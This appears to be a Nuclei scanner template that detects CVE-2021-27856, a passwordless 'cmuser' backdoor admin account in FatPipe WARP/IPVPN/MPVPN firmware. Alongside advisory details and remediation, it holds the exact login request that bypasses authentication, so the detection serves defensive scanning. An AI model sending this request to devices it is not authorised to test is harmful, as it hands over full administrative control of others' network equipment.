id: CVE-2021-27856 info: name: FatPipe WARP/IPVPN/MPVPN - Backdoor Account author: gy741 severity: critical description: | FatPipe WARP, IPVPN, and MPVPN software prior to versions 10.1.2r60p91 and 10.2.2r42 contain an account named "cmuser" with administrative privileges and no password, letting attackers gain unauthorized admin access, exploit requires no authentication. impact: | Unauthenticated attackers can gain unauthorized administrative access via a backdoor account with no password, leading to complete device compromise. remediation: | Upgrade to FatPipe WARP/IPVPN/MPVPN version 10.1.2r60p91 or 10.2.2r42 or later. reference: - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5684.php - https://www.fatpipeinc.com/support/advisories.php - https://www.fatpipeinc.com/support/cve-list.php - https://www.zeroscience.mk/codes/fatpipe_backdoor.txt classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-27856 cwe-id: NVD-CWE-Other epss-score: 0.05598 epss-percentile: 0.9191 cpe: cpe:2.3:o:fatpipeinc:warp_firmware:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: fatpipeinc product: warp_firmware tags: cve,cve2021,fatpipe,default-login,backdoor,auth-bypass,vkev,vuln http: - raw: - | POST /fpui/loginServlet HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded; charset=UTF-8 loginParams=%7B%22username%22%3A%22cmuser%22%2C%22password%22%3A%22%22%2C%22authType%22%3A0%7D matchers-condition: and matchers: - type: status status: - 200 - type: word words: - "application/json" part: header - type: word words: - '"loginRes":"success"' - '"activeUserName":"cmuser"' condition: and # digest: 490a0046304402206b38997ac50f243e27cd99701f9adc3617b900a4e683a69ed8808e487d5f86fe02204d8f5e4e618acfa023c96fa34812945e8958fe11f62b0f1df9a93eaab338ca6d:922c64590222798bb761d5b6d8e72950